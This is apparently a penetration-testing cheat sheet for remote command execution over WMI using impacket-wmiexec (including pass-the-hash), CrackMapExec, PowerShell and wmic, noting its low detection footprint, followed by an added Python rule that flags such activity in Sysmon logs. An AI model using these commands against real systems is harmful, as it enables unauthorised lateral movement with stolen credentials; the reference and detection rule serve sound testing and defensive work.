
Impacket — wmiexec

impacket-wmiexec DOMAIN/user:password@TARGET
impacket-wmiexec DOMAIN/user@TARGET -hashes :NTLM_HASH
Semi-interactive shell. Runs as the authenticating user (not SYSTEM).

Execute Single Command

impacket-wmiexec DOMAIN/user:password@TARGET "whoami"
impacket-wmiexec DOMAIN/user:password@TARGET "ipconfig /all"

CrackMapExec (WMI)

crackmapexec wmi TARGET -u user -p password -x "whoami"

PowerShell (From Windows)

$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred

wmic

wmic /node:TARGET /user:DOMAIN\user /password:password process call create "cmd /c whoami > C:\temp\out.txt"

Advantages

  • No binary uploaded to target
  • Uses WMI over DCOM (TCP 135 plus a dynamic high port)
  • Lower detection footprint than PsExec
  • No service creation

Limitations

  • Semi-interactive (not fully interactive)
  • Output via SMB share (needs ADMIN$ access)
  • Runs as calling user, not SYSTEM
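Added detection example, not part of the original cheat sheet: a small Python triage rule over constructed Sysmon process-creation (Event ID 1) records that flags what the techniques above leave on the target, a shell spawned by WmiPrvSE.exe whose output is redirected to a file or, as impacket-wmiexec does, to the ADMIN$ share. The field names follow Sysmon; the sample records, hosts and usernames are constructed.

```python
import re

# Constructed Sysmon Event ID 1 records, reduced to the fields the rule needs.
# Records 2 and 3 mimic the artefacts of remote WMI execution: cmd.exe spawned
# by WmiPrvSE.exe, with output pushed to ADMIN$ or to a file for pickup.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c whoami", "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1",
     "User": r"CORP\svc_backup"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd /c whoami > C:\temp\out.txt", "User": r"CORP\bob"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "wmic os get version", "User": r"NT AUTHORITY\SYSTEM"},
]

WMI_HOST = re.compile(r"\\wbem\\WmiPrvSE\.exe$", re.IGNORECASE)
SHELLS = re.compile(r"\\(cmd|powershell|pwsh)\.exe$", re.IGNORECASE)
# impacket-wmiexec collects output via \\<host>\ADMIN$\__<timestamp>; match any host.
ADMIN_SHARE_REDIRECT = re.compile(r"\\\\[^\\\s]+\\ADMIN\$\\__", re.IGNORECASE)
# Coarse "cmd /c <cmd> > file" heuristic, as in the PowerShell and wmic one-liners above.
FILE_REDIRECT = re.compile(r"\s[12]?>{1,2}\s*\S")


def score_event(ev):
    """Return (severity, reasons) for one process-creation record."""
    reasons = []
    if not WMI_HOST.search(ev["ParentImage"]):
        return "none", reasons
    reasons.append("spawned by WmiPrvSE.exe (Win32_Process.Create over WMI)")
    cmd = ev["CommandLine"]
    if ADMIN_SHARE_REDIRECT.search(cmd):
        reasons.append("output redirected to ADMIN$ share: impacket-wmiexec pattern")
        return "high", reasons
    if SHELLS.search(ev["Image"]):
        reasons.append("child is a command shell")
        if FILE_REDIRECT.search(cmd):
            reasons.append("shell output redirected to a file for later retrieval")
            return "high", reasons
        return "medium", reasons
    return "low", reasons  # WMI-launched but not a shell: review, do not page


def triage(events):
    """Return (user, severity, reasons) for every record that scores above 'none'."""
    return [(ev["User"], sev, why) for ev in events
            for sev, why in [score_event(ev)] if sev != "none"]


if __name__ == "__main__":
    for user, sev, why in triage(SAMPLE_EVENTS):
        print(f"{sev:6} {user:20} {'; '.join(why)}")
```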

Quick Reference

Task          Command
Shell         impacket-wmiexec DOMAIN/user:pass@TARGET
PtH           impacket-wmiexec DOMAIN/user@TARGET -hashes :HASH
Single cmd    impacket-wmiexec DOMAIN/user:pass@TARGET "whoami"
wmic          wmic /node:TARGET process call create "cmd"